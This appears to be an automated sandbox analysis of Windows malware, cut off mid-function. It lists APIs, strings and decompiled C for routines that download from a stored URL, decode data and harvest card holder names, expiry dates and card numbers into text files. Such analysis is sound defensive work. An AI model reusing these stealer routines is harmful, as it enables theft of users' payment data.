0x0040e23c
0x0040e243
0x0040e250
0x0040e260
0x0040e261
0x0040e266
0x0040e266
0x0040e269
0x0040e275
0x0040e277
0x0040e277
0x0040e27e
0x0040e284
0x0040e28a
0x0040e28c
0x0040e28c
0x0040e290
0x0040e296
0x0040e299
0x0040e30c
0x0040e30f
0x0040e312
0x0040e314
0x0040e314
0x0040e320
0x0040e326
0x0040e328
0x0040e32e
0x0040e29b
0x0040e2a8
0x0040e2ad
0x0040e2b4
0x0040e2b6
0x0040e2b6
0x0040e2c1
0x0040e2c7
0x0040e2cc
0x0040e2ce
0x0040e2d4
0x0040e2de
0x0040e2e6
0x0040e2e7
0x0040e2ec
0x0040e2ec
0x0040e2ef
0x0040e2f9
0x0040e303
0x0040e303
0x0040e333
0x0040e33f
0x0040e341
0x0040e341
0x0040e347
0x0040e348
0x0040e34d
0x0040e350
0x0040e352
0x0040e35e
0x0040e360
0x0040e360
0x0040e36c
0x0040e376
0x0040e37e
0x0040e386
0x0040e583
0x0040e583
0x0040e58b
0x0040e596
0x0040e599
0x0040e5a2
0x0040e5a4
0x0040e5a9
0x0040e5af
0x0040e5b7
0x0040e5b8
0x0040e5bd
0x0040e5bd
0x0040e5c0
0x0040e5c6
0x0040e5cc
0x0040e5d3
0x0040e5d9
0x0040e5e1
0x0040e5e2
0x0040e5e7
0x0040e5e7
0x0040e5ea
0x0040e5f0
0x0040e5f6
0x0040e5fd
0x0040e603
0x0040e605
0x0040e60b
0x0040e60c
0x0040e611
0x0040e611
0x0040e614
0x0040e61a
0x0040e620
0x0040e627
0x0040e62d
0x0040e635
0x0040e636
0x0040e63b
0x0040e63b
0x0040e63e
0x0040e644
0x0040e64a
0x0040e651
0x0040e657
0x0040e65f
0x0040e660
0x0040e665
0x0040e665
0x0040e668
0x0040e66e
0x0040e674
0x0040e67b
0x0040e681
0x0040e683
0x0040e689
0x0040e68a
0x0040e68f
0x0040e68f
0x0040e692
0x0040e698
0x0040e69e
0x0040e6a5
0x0040e6ab
0x0040e6b3
0x0040e6b4
0x0040e6b9
0x0040e6b9
0x0040e6bc
0x0040e6c2
0x0040e6c8
0x0040e6cf
0x0040e6d2
0x0040e6d7
0x0040e6d8
0x0040e6dd
0x0040e6dd
0x0040e6e0
0x0040e6e3
0x0040e6e6
0x0040e6ea
0x0040e6ed
0x0040e6ef
0x0040e6f2
0x0040e6f3
0x0040e6f8
0x0040e6fb
0x00000000
0x0040e38c
0x0040e393
0x0040e399
0x0040e39b
0x0040e39b
0x0040e3b3
0x0040e3b9
0x0040e3bd
0x0040e576
0x0040e57d
0x00000000
0x0040e3c3
0x0040e3ca
0x0040e3d0
0x0040e3d2
0x0040e3d2
0x0040e3e8
0x0040e3ee
0x0040e3f2
0x0040e56f
0x0040e570
0x00000000
0x0040e3f8
0x0040e401
0x0040e409
0x0040e410
0x0040e41c
0x0040e42e
0x0040e4ac
0x0040e4ad
0x0040e4b2
0x0040e4b5
0x0040e4ba
0x00000000
0x00000000
0x0040e4c0
0x0040e4c2
0x0040e568
0x0040e569
0x00000000
0x0040e569
0x0040e4dc
0x0040e4e2
0x0040e4e4
0x00000000
0x00000000
0x0040e4f0
0x0040e4f0
0x0040e4f6
0x0040e4f8
0x00000000
0x00000000
0x0040e507
0x0040e517
0x0040e51c
0x0040e526
0x0040e529
0x0040e52e
0x0040e535
0x0040e539
0x0040e541
0x0040e542
0x0040e547
0x0040e547
0x0040e55e
0x0040e564
0x0040e566
0x00000000
0x00000000
0x00000000
0x00000000
0x0040e566
0x00000000
0x0040e4f0
0x0040e430
0x0040e430
0x0040e43d
0x0040e448
0x0040e453
0x0040e45e
0x0040e469
0x0040e474
0x0040e47f
0x0040e48a
0x0040e492
0x0040e49a
0x0040e49f
0x0040e701
0x0040e704
0x0040e70c
0x0040e70d
0x0040e70e
0x0040e71c
0x0040e71c
0x0040e3f2
0x0040e3bd

APIs

_memset.LIBCMT ref: 0040D9B3
_memset.LIBCMT ref: 0040D9C5
_strlen.LIBCMT ref: 0040D9E7

Part of subcall function 0040C3A0: _strlen.LIBCMT ref: 0040C3B2
Part of subcall function 0040C3A0: _strlen.LIBCMT ref: 0040C3D3

Part of subcall function 00404D00: _memmove.LIBCMT ref: 00404D3D

_strlen.LIBCMT ref: 0040DAC0
_memcmp.LIBCMT ref: 0040DAFF
_strlen.LIBCMT ref: 0040DB2B
_memcmp.LIBCMT ref: 0040DB6A
_strlen.LIBCMT ref: 0040DBD5
_strlen.LIBCMT ref: 0040DD43

Part of subcall function 00404AD0: std::_Xinvalid_argument.LIBCPMT ref: 00404AEA

_strlen.LIBCMT ref: 0040DE34
_strlen.LIBCMT ref: 0040DE92
_strlen.LIBCMT ref: 0040DFC8

Part of subcall function 00404BC0: std::_Xinvalid_argument.LIBCPMT ref: 00404C35

_strlen.LIBCMT ref: 0040E077
_strlen.LIBCMT ref: 0040E0D8
DeleteUrlCacheEntry.WININET(00000000), ref: 0040E27E
DeleteUrlCacheEntry.WININET(?), ref: 0040E290
InternetOpenA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040E2C1
InternetOpenA.WININET(?,00000000,00000000,00000000,00000000), ref: 0040E320
StrCmpCA.SHLWAPI(00000000,https,?,?,00000000,00000000,?,000000FF,000000FF), ref: 0040E36C
InternetConnectA.WININET(?,00000000,00000000,00000000,00000000,00000003,-04800000,00000000), ref: 0040E3B3
HttpOpenRequestA.WININET(00000000,GET,00000000,00000000,00000000,00000000,-04800000,00000000), ref: 0040E3E8
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040E401
HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 0040E426
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0040E4DC
InternetReadFile.WININET(00000000,00000000,000007CF,?), ref: 0040E55E
InternetCloseHandle.WININET(00000000), ref: 0040E569
InternetCloseHandle.WININET(00000000), ref: 0040E570
InternetCloseHandle.WININET(?), ref: 0040E57D

Strings

https://, xrefs: 0040DABB, 0040DAF9
http://, xrefs: 0040DB26, 0040DB64
ERROR, xrefs: 0040E436
https, xrefs: 0040E366
GET, xrefs: 0040E3E2
/, xrefs: 0040DBA6

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: _strlen$Internet$CloseHandleHttpOpen$CacheDeleteEntryFileReadRequestXinvalid_argument_memcmp_memsetstd::_$ConnectInfoQuerySend_memmove
String ID: /$ERROR$GET$http://$https$https://
API String ID: 2157066818-2249406161
Opcode ID: f2212de3051f805e294924f9b4b3488fa0c416fdca05b76d17a53cf1f1c5a59c
Instruction ID: 152c697899a1268db5eab36b0a93685d5612a83291c2a7b54ead98f8249a2b61
Opcode Fuzzy Hash: f2212de3051f805e294924f9b4b3488fa0c416fdca05b76d17a53cf1f1c5a59c
Instruction Fuzzy Hash: 298280B1D002289BEB20DB95DC44BDDB774AF55304F1046EBE80977281DBB86E84CFA6

Uniqueness

Uniqueness Score: -1.00%

Function 0041AC80 Relevance: 51.0, APIs: 23, Strings: 6, Instructions: 236stringmemoryfileCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0041ACE0
lstrcat.KERNEL32(?,025C13D0), ref: 0041ACF6

Part of subcall function 00420520: _malloc.LIBCMT ref: 00420529
Part of subcall function 00420520: GetTickCount.KERNEL32 ref: 00420536
Part of subcall function 00420520: _rand.LIBCMT ref: 00420550
Part of subcall function 00420520: wsprintfA.USER32 ref: 00420565

lstrcat.KERNEL32(?,00000000), ref: 0041AD11
CopyFileA.KERNEL32(?,?,00000001), ref: 0041AD21
_memset.LIBCMT ref: 0041AD35
wsprintfA.USER32 ref: 0041AD48
GetProcessHeap.KERNEL32(00000000,000F423F), ref: 0041AD9C
RtlAllocateHeap.NTDLL(00000000), ref: 0041ADA3
lstrcat.KERNEL32(?,Name: ), ref: 0041AE0A
lstrcat.KERNEL32(?,00000000), ref: 0041AE18
lstrcat.KERNEL32(?,00443C5C), ref: 0041AE2A
lstrcat.KERNEL32(?,Month: ), ref: 0041AE3C
lstrcat.KERNEL32(?,00000000), ref: 0041AE4A
lstrcat.KERNEL32(?,00443C5C), ref: 0041AE5C
lstrcat.KERNEL32(?,Year: ), ref: 0041AE6E
lstrcat.KERNEL32(?,00000000), ref: 0041AE7C
lstrcat.KERNEL32(?,00443C5C), ref: 0041AE8E
lstrcat.KERNEL32(?,Card: ), ref: 0041AEA0

Part of subcall function 0041A2B0: _memcmp.LIBCMT ref: 0041A302
Part of subcall function 0041A2B0: _memset.LIBCMT ref: 0041A32B
Part of subcall function 0041A2B0: LocalAlloc.KERNEL32(00000040,?), ref: 0041A365

lstrcat.KERNEL32(?,00000000), ref: 0041AF02
lstrcat.KERNEL32(?,004458A8), ref: 0041AF49
lstrlen.KERNEL32(?), ref: 0041AF6F
_memset.LIBCMT ref: 0041AF9B
DeleteFileA.KERNEL32(?), ref: 0041AFC7

Strings

Year: , xrefs: 0041AE68
Card: , xrefs: 0041AE9A
Name: , xrefs: 0041AE04
\CC\%s_%s.txt, xrefs: 0041AD42
ZHaZea, xrefs: 0041ADB6, 0041AF56
Month: , xrefs: 0041AE36

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: lstrcat$_memset$FileHeapwsprintf$AllocAllocateCopyCountDeleteLocalProcessTick_malloc_memcmp_randlstrlen
String ID: Card: $Month: $Name: $Year: $ZHaZea$\CC\%s_%s.txt
API String ID: 3147009583-2730206551
Opcode ID: e02bb65d235b10429b7cfdb21c9aa3bbdf00aa14755b584fd8f81dbc02cb26b8
Instruction ID: 7943e74667ceca598876734ffff0cc1693fee65af07d03f0cd68f6572076d18a
Opcode Fuzzy Hash: e02bb65d235b10429b7cfdb21c9aa3bbdf00aa14755b584fd8f81dbc02cb26b8
Instruction Fuzzy Hash: FA9171B5A00318ABCB60EF64DC4DFDA7778EB89701F004599F509A7251DB789B80CF69

Uniqueness

Uniqueness Score: -1.00%

Function 004014E0 Relevance: 42.2, APIs: 22, Strings: 2, Instructions: 161
memoryCOMMON

Download Yara Rule

C-Code - Quality: 98%

			E004014E0(void* __ebx, void* __edi, void* __eflags, intOrPtr _a4) {
				signed int _v8;
				char _v268;
				char _v5244;
				void* _v5248;
				long _v5252;
				void* __esi;
				signed int _t48;
				void* _t82;
				intOrPtr _t92;
				signed int _t138;

				E0042BC40(0x1480);
				_t48 =  *0x451f00; // 0xc21d6f0a
				_v8 = _t48 ^ _t138;
				E0042A2F0( &_v5244, 0, 0x1370);
				E0042BD10( &_v5244, "Leslie Hicks is an American associate professor of analytical chemistry at the University of North Carolina at Chapel Hill.");
				E004204B0( &_v5244);
				E0042BC70( &_v5244);
				E004204B0( &_v5244);
				E0042BC70( &_v5244);
				E004204B0( &_v5244);
				E0042BC70( &_v5244);
				E0042A2F0( &_v268, 0, 0x104);
				E004204B0( &_v5244);
				E0042BC70( &_v5244);
				E004204B0( &_v5244);
				E0042BC70( &_v5244);
				E004204B0( &_v5244);
				E0042BC70( &_v5244);
				E0042BD10( &_v268, E00401430(__ebx, _a4));
				E004204B0( &_v5244);
				E0042BC70( &_v5244);
				E004204B0( &_v5244);
				E0042BC70( &_v5244);
				E004204B0( &_v5244);
				E0042BC70( &_v5244);
				_t82 = RtlAllocateHeap(GetProcessHeap(), 0, 0x104); // executed
				_v5248 = _t82;
				_v5252 = 0;
				VirtualProtect(_t82, 4, 0x100,  &_v5252); // executed
				E004204B0( &_v5244);
				E0042BC70( &_v5244);
				E004204B0( &_v5244);
				E0042BC70( &_v5244);
				E004204B0( &_v5244);
				E0042BC70( &_v5244);
				_t92 =  *0x4536b8; // 0x440404
				E004011C0( &_v268, _t92,  &_v5248); // executed
				E004204B0( &_v5244);
				E0042BC70( &_v5244);
				E004204B0( &_v5244);
				E0042BC70( &_v5244);
				E004204B0( &_v5244);
				E0042BC70( &_v5244);
				E0042A2F0( &_v268, 0, 0x104);
				E0042A2F0( &_v5244, 0, 0x1370);
				return E0042A36A(_v5248, __ebx, _v8 ^ _t138,  &_v268, __edi, _a4);
			}

0x004014e8
0x004014ed
0x004014f4
0x00401509
0x0040151a
0x00401526
0x00401532
0x0040153e
0x0040154a
0x00401556
0x00401562
0x00401575
0x00401581
0x0040158d
0x0040159c
0x004015a8
0x004015b4
0x004015c0
0x004015d3
0x004015df
0x004015eb
0x004015f7
0x00401603
0x0040160f
0x0040161b
0x00401631
0x00401646
0x0040164c
0x00401656
0x00401663
0x0040166f
0x0040167b
0x00401687
0x00401693
0x0040169f
0x004016a4
0x004016b8
0x004016c4
0x004016d0
0x004016dc
0x004016e8
0x004016f4
0x00401700
0x00401713
0x00401729
0x00401745

APIs

_memset.LIBCMT ref: 00401509
_strlen.LIBCMT ref: 00401532
_strlen.LIBCMT ref: 0040154A
_strlen.LIBCMT ref: 00401562
_memset.LIBCMT ref: 00401575
_strlen.LIBCMT ref: 0040158D
_strlen.LIBCMT ref: 004015A8
_strlen.LIBCMT ref: 004015C0

Part of subcall function 00401430: _memset.LIBCMT ref: 00401461
Part of subcall function 00401430: CryptStringToBinaryA.CRYPT32(?,00000000,00000000), ref: 00401493
Part of subcall function 00401430: CryptStringToBinaryA.CRYPT32(?,00000000,00000000,00000000), ref: 004014B4

_strlen.LIBCMT ref: 004015EB
_strlen.LIBCMT ref: 00401603
_strlen.LIBCMT ref: 0040161B
GetProcessHeap.KERNEL32(00000000,00000104), ref: 0040162A
RtlAllocateHeap.NTDLL(00000000), ref: 00401631
VirtualProtect.KERNEL32 ref: 00401656
_strlen.LIBCMT ref: 0040166F
_strlen.LIBCMT ref: 00401687
_strlen.LIBCMT ref: 0040169F
_strlen.LIBCMT ref: 004016D0
_strlen.LIBCMT ref: 004016E8
_strlen.LIBCMT ref: 00401700
_memset.LIBCMT ref: 00401713
_memset.LIBCMT ref: 00401729

Strings

Leslie Hicks is an American associate professor of analytical chemistry at the University of North Carolina at Chapel Hill., xrefs: 00401514
63680871019937343784, xrefs: 004016B0

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: _strlen$_memset$BinaryCryptHeapString$AllocateProcessProtectVirtual
String ID: 63680871019937343784$Leslie Hicks is an American associate professor of analytical chemistry at the University of North Carolina at Chapel Hill.
API String ID: 1315817530-3947518970
Opcode ID: 045c34da83aa2f5987ee4f550304593b6aa116b818b86726533d69994857752a
Instruction ID: b36970127b01d82e147781557b56c087ba80857b04b3c5648f73b8efa44140c4
Opcode Fuzzy Hash: 045c34da83aa2f5987ee4f550304593b6aa116b818b86726533d69994857752a
Instruction Fuzzy Hash: 53511071A14629A6DB20F7B1DC49EDD737CAB04308F8045CEB65463092DB7DABC48BB8

Uniqueness

Uniqueness Score: -1.00%

Function 0040C480 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 240
stringnetworkCOMMON

Download Yara Rule

C-Code - Quality: 24%

			E0040C480(void* __eflags, intOrPtr* _a4) {
				long _v8;
				char _v16;
				signed int _v20;
				char _v1020;
				char _v2020;
				char _v3020;
				char _v8020;
				intOrPtr _v8028;
				char _v8032;
				char _v8048;
				intOrPtr _v8056;
				char _v8076;
				char _v8077;
				intOrPtr _v8084;
				signed short _v8120;
				signed int _v8124;
				intOrPtr _v8128;
				signed int _v8136;
				intOrPtr _v8140;
				void* _v8144;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t65;
				intOrPtr* _t68;
				signed int _t76;
				intOrPtr _t78;
				char* _t79;
				intOrPtr _t87;
				intOrPtr* _t88;
				intOrPtr* _t89;
				void* _t93;
				void* _t103;
				char* _t113;
				intOrPtr _t117;
				void* _t119;
				long _t122;
				char* _t129;
				void* _t150;
				intOrPtr _t151;
				void* _t153;
				void* _t154;
				void* _t156;
				char* _t157;
				signed int _t158;
				void* _t159;
				void* _t161;
				char* _t163;
				void* _t164;
				void* _t165;
				char* _t166;
				void* _t169;
				void* _t170;
				void* _t172;

				_t169 = __eflags;
				_push(0xffffffff);
				_push(E0043E066);
				_push( *[fs:0x0]);
				E0042BC40(0x1fc0);
				_t65 =  *0x451f00; // 0xc21d6f0a
				_v20 = _t65 ^ _t158;
				_push(_t154);
				 *[fs:0x0] =  &_v16;
				_t68 = _a4;
				_t151 =  *_t68;
				_t117 =  *((intOrPtr*)(_t68 + 4));
				E0042A2F0( &_v8144, 0, 0x3c);
				E0042A2F0( &_v8020, 0, 0x1388);
				E0042A2F0( &_v3020, 0, 0x3e8);
				E0042A2F0( &_v2020, 0, 0x3e8);
				_t76 = E0042A2F0( &_v1020, 0, 0x3e8) | 0xffffffff;
				_v8144 = 0x3c;
				_v8136 = _t76;
				_v8124 = _t76;
				_v8128 = E0042976C(_t151, _t154, _t169, 0x400, _t65 ^ _t158);
				_t78 = E0042976C(_t151, _t154, _t169, 0x400, _t150);
				_t161 = _t159 + 0x44;
				_v8140 = _t78;
				_t79 =  *0x451844; // 0x25ca500
				_t170 =  *0x451858 - 0x10; // 0xf
				if(_t170 < 0) {
					_t79 = 0x451844;
				}
				_t122 =  *0x451854; // 0x0
				if(InternetCrackUrlA(_t79, _t122, 0,  &_v8144) != 0) {
					wsprintfA( &_v3020, "%d", _v8120 & 0x0000ffff);
					_t161 = _t161 + 0xc;
					 *0x464860( &_v2020, _v8128);
					 *0x464860( &_v1020, _v8140);
					_push("://");
					_push( &_v1020);
				} else {
					 *0x464860( &_v3020, "80");
					_t113 =  *0x451844; // 0x25ca500
					_t172 =  *0x451858 - 0x10; // 0xf
					if(_t172 < 0) {
						_t113 = 0x451844;
					}
					 *0x464860( &_v2020, _t113);
					_push("http://");
					_push( &_v1020);
				}
				 *0x464860();
				_t87 =  *0x453c98; // 0x3377020
				_push(_t87);
				_t88 = E0041F8E0( &_v8077,  &_v8076); // executed
				_v8 = 0;
				if( *((intOrPtr*)(_t88 + 0x14)) >= 0x10) {
					_t88 =  *_t88;
				}
				_push(_t88);
				_t89 = E0040A830( &_v8077,  &_v8048);
				_v8 = 1;
				if( *((intOrPtr*)(_t89 + 0x14)) >= 0x10) {
					_t89 =  *_t89;
				}
				_t163 = _t161 + 4 - 0x1c;
				_t129 = _t163;
				_v8084 = _t163;
				 *((intOrPtr*)(_t129 + 0x14)) = 0xf;
				 *((intOrPtr*)(_t129 + 0x10)) = 0;
				 *_t129 = 0;
				E00404AD0(_t129, 0x45187c, 0, 0xffffffff); // executed
				_t93 = E004144C0(); // executed
				_t164 = _t163 + 0x44;
				 *0x464860( &_v8020, _t93,  &_v1020,  &_v2020, E0042D020(),  &_v3020, "/", _t151, _t117, 0x443c1c, _t89);
				if(_v8028 >= 0x10) {
					_push(_v8048);
					E0042A289();
					_t164 = _t164 + 4;
				}
				_v8028 = 0xf;
				_v8032 = 0;
				_v8048 = 0;
				_v8 = 0xffffffff;
				if(_v8056 >= 0x10) {
					_push(_v8076);
					E0042A289();
					_t164 = _t164 + 4;
				}
				E0042A2F0( &_v8144, 0, 0x3c);
				E0042A2F0( &_v3020, 0, 0x3e8);
				_t147 =  &_v2020;
				E0042A2F0( &_v2020, 0, 0x3e8);
				E0042A2F0( &_v1020, 0, 0x3e8);
				_t165 = _t164 + 0x30;
				_push( &_v8020);
				if( *0x464758() <= 4) {
					_t103 =  *0x464758( &_v8020);
					 *0x453cf4 = 1;
					__eflags = _t103 - 2;
					if(_t103 != 2) {
						 *0x453cf4 = 0;
					}
				} else {
					_t166 = _t165 - 0x1c;
					_t157 = _t166;
					_t147 =  &_v8020;
					_v8084 = _t166;
					 *((intOrPtr*)(_t157 + 0x14)) = 0xf;
					 *((intOrPtr*)(_t157 + 0x10)) = 0;
					 *_t157 = 0;
					E00404BC0(_t157,  &_v8020, E0042BC70( &_v8020));
					E0040AA70(0xf);
					 *0x453cf4 = 1;
				}
				 *[fs:0x0] = _v16;
				_pop(_t153);
				_pop(_t156);
				_pop(_t119);
				return E0042A36A(0, _t119, _v20 ^ _t158, _t147, _t153, _t156);
			}

0x0040c480
0x0040c483
0x0040c485
0x0040c490
0x0040c496
0x0040c49b
0x0040c4a2
0x0040c4a6
0x0040c4ac
0x0040c4b2
0x0040c4b5
0x0040c4b7
0x0040c4c5
0x0040c4d8
0x0040c4eb
0x0040c4fe
0x0040c516
0x0040c51e
0x0040c528
0x0040c52e
0x0040c541
0x0040c547
0x0040c551
0x0040c554
0x0040c55a
0x0040c55f
0x0040c565
0x0040c567
0x0040c567
0x0040c56c
0x0040c585
0x0040c5db
0x0040c5e7
0x0040c5f2
0x0040c606
0x0040c60c
0x0040c617
0x0040c587
0x0040c593
0x0040c599
0x0040c59e
0x0040c5a4
0x0040c5a6
0x0040c5a6
0x0040c5b3
0x0040c5b9
0x0040c5c4
0x0040c5c4
0x0040c618
0x0040c61e
0x0040c623
0x0040c631
0x0040c636
0x0040c640
0x0040c642
0x0040c642
0x0040c644
0x0040c652
0x0040c657
0x0040c65e
0x0040c660
0x0040c660
0x0040c68d
0x0040c690
0x0040c692
0x0040c6a2
0x0040c6a5
0x0040c6ad
0x0040c6af
0x0040c6b4
0x0040c6b9
0x0040c6c4
0x0040c6d0
0x0040c6d8
0x0040c6d9
0x0040c6de
0x0040c6de
0x0040c6e1
0x0040c6e7
0x0040c6ed
0x0040c6f3
0x0040c700
0x0040c708
0x0040c709
0x0040c70e
0x0040c70e
0x0040c71b
0x0040c72d
0x0040c737
0x0040c73f
0x0040c751
0x0040c756
0x0040c75f
0x0040c769
0x0040c7b7
0x0040c7bd
0x0040c7c7
0x0040c7ca
0x0040c7cc
0x0040c7cc
0x0040c76b
0x0040c76b
0x0040c76e
0x0040c770
0x0040c776
0x0040c77c
0x0040c77f
0x0040c783
0x0040c797
0x0040c79c
0x0040c7a4
0x0040c7a4
0x0040c7d7
0x0040c7df
0x0040c7e0
0x0040c7e1
0x0040c7ef

APIs

_memset.LIBCMT ref: 0040C4C5
_memset.LIBCMT ref: 0040C4D8
_memset.LIBCMT ref: 0040C4EB
_memset.LIBCMT ref: 0040C4FE
_memset.LIBCMT ref: 0040C511
InternetCrackUrlA.WININET(025CA500,00000000,00000000,?), ref: 0040C57D
lstrcat.KERNEL32(?,00445870), ref: 0040C593
lstrcat.KERNEL32(?,025CA500), ref: 0040C5B3
wsprintfA.USER32 ref: 0040C5DB
lstrcat.KERNEL32(?,?), ref: 0040C5F2
lstrcat.KERNEL32(?,?), ref: 0040C606
lstrcat.KERNEL32(?,://), ref: 0040C618
lstrcat.KERNEL32(?,00000000), ref: 0040C6C4
_memset.LIBCMT ref: 0040C71B
_memset.LIBCMT ref: 0040C72D
_memset.LIBCMT ref: 0040C73F
_memset.LIBCMT ref: 0040C751
lstrlen.KERNEL32(?), ref: 0040C760
_strlen.LIBCMT ref: 0040C785

Part of subcall function 0040AA70: _memset.LIBCMT ref: 0040AAB9
Part of subcall function 0040AA70: _strtok_s.LIBCMT ref: 0040AAE8
Part of subcall function 0040AA70: lstrlen.KERNEL32(00000000,?,?,?,C21D6F0A,?,00000000), ref: 0040AB01
Part of subcall function 0040AA70: _memset.LIBCMT ref: 0040AB1D
Part of subcall function 0040AA70: _memset.LIBCMT ref: 0040AB2F
Part of subcall function 0040AA70: lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,C21D6F0A,?,00000000), ref: 0040AB38
Part of subcall function 0040AA70: lstrcpy.KERNEL32(?,00000005), ref: 0040AB8B
Part of subcall function 0040AA70: StrCmpCA.SHLWAPI(?,open_,?,?,?,?,?,?,?,?,?,C21D6F0A,?,00000000), ref: 0040AB9D
Part of subcall function 0040AA70: _strlen.LIBCMT ref: 0040ABC3
Part of subcall function 0040AA70: _memset.LIBCMT ref: 0040ACC6

lstrlen.KERNEL32(?), ref: 0040C7B7

Strings

http://, xrefs: 0040C5B9
<, xrefs: 0040C51E
://, xrefs: 0040C60C

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: _memset$lstrcat$lstrlen$_strlen$CrackInternet_strtok_slstrcpywsprintf
String ID: ://$<$http://
API String ID: 1730678565-1638580327
Opcode ID: 4e7f9ad78cd1639e6a30108fc2d126b8371907896c1a42ff922cb8b3937153e0
Instruction ID: a97cfeb8afe1a4db62b79afd0bcaf5e7f803bfc3cd3e687b0e5ab69d849315a0
Opcode Fuzzy Hash: 4e7f9ad78cd1639e6a30108fc2d126b8371907896c1a42ff922cb8b3937153e0
Instruction Fuzzy Hash: 769172B1D00359ABDB20EF51DC81FEA7778EB44744F0005BAF509A7281EB789A848F59

Uniqueness

Uniqueness Score: -1.00%

Function 0041A450 Relevance: 40.5, APIs: 22, Strings: 1, Instructions: 212stringfileCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0041A4AD
lstrcat.KERNEL32(?,025C13D0), ref: 0041A4C3

Part of subcall function 00420520: _malloc.LIBCMT ref: 00420529
Part of subcall function 00420520: GetTickCount.KERNEL32 ref: 00420536
Part of subcall function 00420520: _rand.LIBCMT ref: 00420550
Part of subcall function 00420520: wsprintfA.USER32 ref: 00420565

lstrcat.KERNEL32(?,00000000), ref: 0041A4DE
CopyFileA.KERNEL32(00000000,?,00000001), ref: 0041A4EE
DeleteFileA.KERNEL32(?), ref: 0041A739

Part of subcall function 0041A2B0: _memcmp.LIBCMT ref: 0041A302
Part of subcall function 0041A2B0: _memset.LIBCMT ref: 0041A32B
Part of subcall function 0041A2B0: LocalAlloc.KERNEL32(00000040,?), ref: 0041A365

StrCmpCA.SHLWAPI(?,00443C1C), ref: 0041A5DC
StrCmpCA.SHLWAPI(00000000,00443C1C), ref: 0041A5EC
lstrcat.KERNEL32(0041B193,00443C5C), ref: 0041A600
lstrcat.KERNEL32(0041B193,025C86A0), ref: 0041A60E
lstrcat.KERNEL32(0041B193,?), ref: 0041A61C
lstrcat.KERNEL32(0041B193,004458A4), ref: 0041A628
lstrcat.KERNEL32(0041B193,?), ref: 0041A636
lstrcat.KERNEL32(0041B193,004458A0), ref: 0041A642
lstrcat.KERNEL32(0041B193,025C8880), ref: 0041A650
lstrcat.KERNEL32(0041B193,00000000), ref: 0041A658
lstrcat.KERNEL32(0041B193,00443C5C), ref: 0041A664
lstrcat.KERNEL32(0041B193,025C8690), ref: 0041A671
lstrcat.KERNEL32(0041B193,00000000), ref: 0041A679
lstrcat.KERNEL32(0041B193,00443C5C), ref: 0041A685
lstrcat.KERNEL32(0041B193,025C9270), ref: 0041A693
lstrcat.KERNEL32(0041B193,?), ref: 0041A6B0
lstrcat.KERNEL32(0041B193,004458A8), ref: 0041A6BC

Strings

ZHaZea, xrefs: 0041A543, 0041A703

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: lstrcat$File_memset$AllocCopyCountDeleteLocalTick_malloc_memcmp_randwsprintf
String ID: ZHaZea
API String ID: 2507637429-655617003
Opcode ID: a9563b9fe332cb31d13d3e89cb9dd14e830c16db8ba924743eb0a061926f21d5
Instruction ID: 3d12cf94676921fbb9428e40772027aff01fe4b8c920ef62204eea21f9f24c11
Opcode Fuzzy Hash: a9563b9fe332cb31d13d3e89cb9dd14e830c16db8ba924743eb0a061926f21d5
Instruction Fuzzy Hash: 81818075600218ABDB50EF54EC49FEA77B8FF8A702F0044A9F50593251D774AB50CF6A

Uniqueness

Uniqueness Score: -1.00%

Function 0040D6E0 Relevance: 36.9, APIs: 19, Strings: 2, Instructions: 171
stringCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E0040D6E0(void* __edi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				char _v5008;
				char _v10008;
				char _v25008;
				char _v75008;
				char _v125008;
				char* _v125012;
				char _v125016;
				intOrPtr _v125020;
				intOrPtr _v125024;
				intOrPtr __ebx;
				void* __esi;
				signed int _t41;
				signed int _t56;
				void* _t61;
				intOrPtr _t62;
				char _t73;
				void* _t75;
				signed int _t76;
				void* _t77;
				void* _t79;

				_t72 = __edi;
				E0042BC40(0x1e85c);
				_t41 =  *0x451f00; // 0xc21d6f0a
				_v8 = _t41 ^ _t76;
				_v125020 = _a8;
				_v125012 = 0;
				E0042A2F0( &_v75008, 0, 0xc350);
				E0042A2F0( &_v10008, 0, 0x1388);
				E0042A2F0( &_v5008, 0, 0x1388);
				E0042A2F0( &_v125008, 0, 0xc350);
				E0042A2F0( &_v25008, 0, 0x3a98);
				 *0x464860( &_v75008, _a4);
				_t71 =  &_v75008;
